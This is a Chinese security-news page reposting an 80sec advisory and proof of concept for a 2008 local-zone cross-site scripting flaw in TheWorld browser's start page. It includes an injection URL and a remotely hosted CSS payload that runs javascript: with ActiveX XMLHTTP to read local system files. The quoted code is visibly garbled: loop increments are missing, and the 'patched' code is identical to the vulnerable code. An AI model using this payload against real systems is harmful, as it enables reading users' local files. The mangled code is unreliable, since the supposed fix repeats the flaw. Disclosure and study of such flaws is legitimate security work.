当前位置：移动技术网 > 网络运营>安全>漏洞 > 世界之窗等浏览器本地xss跨域漏洞POC

世界之窗等浏览器本地xss跨域漏洞POC

2019年05月26日 | 移动技术网网络运营 | 我要评论

漏洞说明：http://www.80sec.com/360-sec-browser-localzone-xss.html

　　文档来源:http://www.80sec.com/release/the-world-browser-locale-zone-xss-poc.txt

　　漏洞分析：世界之窗浏览器在起始页面是以res://e:\progra~1\thewor~1.0\languages\chs.dll/twhome.htm的形式来处理的，而由于缺乏对res协议安全的必要控制，导致页面的权限很高，而该页面中存在的一个xss问题将导致本地跨域漏洞，简单分析如下：

<script language="javascript">
var noldcount = 0;
for( i = 0; i < g_ncountold; i )
{
str_url = g_arr_argurlold[i];
str_name = g_arr_argnameold[i];
str_td = “<tr id=’twolditem” i ”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’删除当前项’ onclick=\”javascript:tw_deleteitemold(’” i ”‘);\”>” “<img border=’0′ src=’twpage_delete.gif’ width=’16′ height=’16′></div></a></td>”;
document.write( str_td );
str_td = “<td><a target=’_blank’ href=’” str_url “‘>” str_name “</a></td></tr>”;
document.write( str_td );
noldcount = i;
g_bhaslasturl = true;
}
</script>

　　str_name和str_url不经过滤地直接输出，由于该页面处于本地安全区域，所以拥有很高的权限，可以做很多跨域操作，包括读取文件和运行本地程序。

　　漏洞修补：

<script language="javascript">
var noldcount = 0;
for( i = 0; i < g_ncountold; i )
{
str_url = g_arr_argurlold[i];
str_name = g_arr_argnameold[i];
str_td = “<tr id=’twolditem” i ”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’删除当前项’ onclick=\”javascript:tw_deleteitemold(’” i ”‘);\”>” “<img border=’0′ src=’twpage_delete.gif’ width=’16′ height=’16′></div></a></td>”;
document.write( str_td );
str_td = “<td><a target=’_blank’ href=’” str_url “‘>” str_name “</a></td></tr>”;
document.write( str_td );
noldcount = i;
g_bhaslasturl = true;
}
</script>

　　已经用js控制dom显示了

　　漏洞演示：这里提供测试方法可以读取c:/boot.ini

　　1 打开如下地址

sc:h’><script>alert(document.write(unescape(””)))</script>

　　2 上面将导致一个不可访问的页面，然后直接关闭tw浏览器( 没有好的办法crash)

　　3 重新打开tw浏览器，可以发现http://www.80sec.com/1.css中的内容被解析，并且有本地域的权限。

　　1.css内容，换成其他js代码一样执行

body {
background-image: url('javascript:alert(document.location);xmlhttp=new activexobject("msxml2.xmlhttp.3.0");xmlhttp.open("get","c:/boot.ini",false);xmlhttp.send();alert(xmlhttp.responsetext);')
}

　　漏洞状态：

　　2008-06-24通知厂商

　　2008-06-25修补

　　http://www.ioage.com/cnnew/uplog.htm

您可能感兴趣的文章:

如对本文有疑问，点击进行留言回复！！

Microsoft Visio多个远程代码执行漏洞（MS08-019）

受影响系统： Microsoft Visio 2007 SP1 Microsoft Visio 2007 Microsoft Visio 2003 ... [阅读全文]
Windows DNS客户端可预测事件处理ID漏洞

Windows DNS客户端服务在执行DNS查询时，随机选择事件处理值没有提供足够的熵。未经认证的攻击者可以向有漏洞客户端的DNS请求返回恶意响应，欺骗或重新定... [阅读全文]
Microsoft Project资源内存分配远程代码执行漏洞（MS08-018）

受影响系统： Microsoft Project 2003 SP2 Microsoft Project 2002 SP1 Microsoft Pro... [阅读全文]
IE7弹出窗口地址栏URI欺骗漏洞

受影响系统：　　Microsoft Internet Explorer 7.0 　　描述：　　BUGTRAQ ID: 28498 　　I... [阅读全文]
Linux Audit audit_log_user_command 栈溢出漏洞

受影响系统： Linux Audit Linux Audit 1.6.9 不受影响系统： Linux Audit Linux Audit 1.... [阅读全文]
IE 0day漏洞问题出自MS Works

近几天网络上流传着一个传说为IE0DAY的POC代码，在XP系统环境下通杀了IE6和IE7，其它系统并未经过测试。其实这个漏洞并不是存在于IE，而是Micros... [阅读全文]
世界之窗等浏览器本地xss跨域漏洞POC

漏洞说明：http://www.80sec.com/360-sec-browser-localzone-xss.html 　　文档来源:http://... [阅读全文]
FoosunCMS Sql Injection Vulnerability

--== =================== www.nspcn.org ================= ==-- --== FoosunCMS ... [阅读全文]
关于XSS漏洞另一个攻击趋势

XSS漏洞一般是基于WEB程序的输入输出问题，但最近80SEC开始发现了一系列以IE为内核的第三方浏览器的漏洞，在评估其中的XSS漏洞，我们发现了基于浏览器软件... [阅读全文]
PHPCMS2.4中一个有趣的洞洞

今天，朋友丢来一个站，说想拿点资料，但搞了很久老搞不下，叫我帮忙看看打开一看发现是phpcms2.4，很旧的版本了~~ 搞了一下发现存在“上传漏洞”和... [阅读全文]

网友评论


验证码：

世界之窗等浏览器本地xss跨域漏洞POC

2019年05月26日 | 移动技术网网络运营 | 我要评论

您可能感兴趣的文章:

相关文章:

网友评论